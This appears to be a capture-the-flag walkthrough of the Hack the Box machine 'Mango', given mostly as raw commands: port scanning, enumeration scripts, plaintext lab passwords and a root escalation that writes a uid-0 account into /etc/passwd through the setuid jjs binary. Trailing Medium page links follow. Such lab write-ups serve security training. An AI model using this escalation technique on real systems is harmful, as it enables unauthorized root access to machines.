Hack the Box: Mango



nmap -sS -sV -n -p- mango.htb-- snip --PORT    STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
443/tcp open ssl/ssl Apache httpd (SSL-only mode)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
# openssl s_client -showcerts -connect mango.htb:443
depth=0 C = IN, ST = None, L = None, O = Mango Prv Ltd., OU = None, CN = staging-order.mango.htb, emailAddress = admin@mango.htb
-- snip --
Mango login page
Logged in to staging-order
# python mango-enum-users.py 
# python mango-enum-password.py -u admin
# python mango-enum-password.py -u mango
# ssh mango@mango.htb
-- snip --
Password: h3mXK8RhU~f{]f5H
mango@mango:~$ su admin
Password: t9KcS3>!0B#2

$ cd /home/admin
$ cat user.txt


$ find / -perm /4000 2>/dev/null
-- snip --
-- snip --
openssl passwd -1 -salt tellico test123
$ cd /tmp
$ cp /etc/passwd .
$ echo "tellico:\$1\$tellico$30TQ5Bff7wtirtpxbOqmR/:0:0::/root:/bin/bash" >> passwd
$ echo "Java.type('java.lang.Runtime').getRuntime().exec('cp passwd /etc/passwd').waitFor()" | jjs
$ su tellico
Password: test123
root@mango:/home/admin/tellico# cd /root
root@mango:~# cat root.txt




Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Remote & Local Port Tunneling

{UPDATE} Tinkerball Hack Free Resources Generator

{UPDATE} Hidden Objects Hack Free Resources Generator

Best Free Firewalls for Windows to Protect Your Computer from Cyberattacks

Launch the META-AIRLINE HomePage

Cyber Security (Better Than Musk)

Privacy Policy

Satellite cyberattacks, Russian disinformation and ContiLeaks fallout

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Tellico Lungrevink

Tellico Lungrevink

More from Medium

Network Services (Telnet) — Tryhackme


TryHackMe | Skynet Write up

Basic Pentesting CTF Walkthrough